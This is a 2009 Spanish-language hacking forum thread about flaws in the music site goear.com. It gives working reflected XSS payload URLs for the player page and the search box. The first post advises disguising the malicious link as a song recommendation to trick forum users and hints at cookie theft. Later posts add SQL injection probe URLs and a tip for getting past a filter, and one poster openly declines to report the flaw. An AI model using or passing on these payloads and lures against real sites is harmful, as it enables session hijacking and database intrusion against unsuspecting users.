xss en goear.com

Iniciado por jdc, 8 Noviembre 2009, 20:49 PM

0 Miembros y 8 Visitantes están viendo este tema.

jdc

Por lo general no posteo xss pero este en particular me parece que es especialmente grave por la ingenieria social que se le puede aplicar, ya que es en un sitio de musica online y es facil decir "Oh mira que cancion tan buena" :¬¬

Esta reportado 11/08/2009

El xss esta en la pagina donde se abre el reproductor portable...

Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD

por ejemplo tenemos una cancion cualquiera:

http://www.goear.com/listenwin.php?v=78707c5

le agregamos nuestro codigo malo xD

http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias ;)')</script>

Que en el navegador se vera:

http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E

y que podemos disfrazar en foros asi

http://www.goear.com/listenwin.php?v=78707c5 y decir "esta cancion es genial"

No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin

Saludos.

PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬

Castg!

estaba buscando vulenrabilidad a goear cuando me vengoa l foro y ya postearon! xd!

WHK


jdc

#3
Ok gracias :) complemente la informacion en el post de SDC que no recordaba xD

http://foro.elhacker.net/nivel_web/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html;msg1343265#msg1343265

Ahi aclare que la vulnerabilidad no ha sido reparada y puse los datos que se piden

**********
EDITO:
**********

El buscador de goear tambien tiene xss, solo hay que escapar con "> por ejemplo si buscas

green day"><script>alert('janito24')</script>

Lo que te llevaria a:

http://www.goear.com/search.php?q=green+day%22%3E%3Cscript%3Ealert%28%27janito24%27%29%3C%2Fscript%3E

YST

Agregale un SQLI  :P

Código (VB) [Seleccionar]

http://www.goear.com/listenwin.php?v=78707c5'+and+1=1+--+
http://www.goear.com/listenwin.php?v=78707c5'+and+1=2+--+


Yo le enseñe a Kayser a usar objetos en ASM

fede_cp

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

YST

No se para que tanto  desordern en el order tan solo con el /**/ te saltas el filtro :xD Lo malo es que el Select te lo jode :xD


Yo le enseñe a Kayser a usar objetos en ASM

jdc

YST sería bueno que reportaras la sqli :)

Saludos y felicidades ;)

YST

Cita de: janito24 en  9 Noviembre 2009, 06:46 AM
YST sería bueno que reportaras la sqli :)

Yo no reporto nada :xD Si alguien quiere reportarlo es libre :P


Yo le enseñe a Kayser a usar objetos en ASM

fede_cp

en goear hay un bug, realemente importante, si quieren le publico y si no se puede por mp se los dire


saludos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!